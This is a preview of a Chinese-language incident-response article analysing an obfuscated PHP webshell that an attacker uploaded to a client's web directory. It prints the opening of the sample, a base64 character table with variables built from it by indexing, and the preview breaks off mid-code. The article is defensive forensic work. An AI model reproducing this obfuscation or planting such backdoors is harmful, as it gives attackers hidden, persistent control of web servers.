对某次应急响应中webshell的分析

文章预览

文章前言 近期在处理一起应急事件时发现攻击者在WEB应用目录下上传了webshell，但是webshell似乎使用了某种加密混淆手法，无法直观的看到其中的木马连接密码，而客户非要让我们连接webshell来证实此文件为后门文件且可执行和利用，遂对提取到的webshell进行解密分析操作看看到底其内容是什么以及看一下这个其中到底使用了那种加密混淆手法对webshell进行混淆处理 样本文件 从客户环境中提取的webshell样本文件如下所示： 样本分析 首先对木马文件进行格式化处理： define( 'HLPHNk0717' , __FILE__ ); $fBqGfZ=base64_decode( "bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZkxLeGNGT1ZrdHlYYmpXQkFwUURsTmVVSVN1SkV6ckN3Z1ladmlvc21QZGhIYXFSR1RuTQ==" ); $KMoqeF=$fBqGfZ[ 3 ].$fBqGfZ[ 6 ].$fBqGfZ[ 33 ].$fBqGfZ[ 30 ]; $bBbJLf=$fBqGfZ[ 33 ].$fBqGfZ[ 10 ].$fBqGfZ[ 24 ].$fBqGfZ[ 10 ].$fBqGfZ[ 24 ]; $WgEkem=$bBbJLf[ 0 ].$fBqGfZ[ 18 ].$fBqGfZ[ 3 ………………………………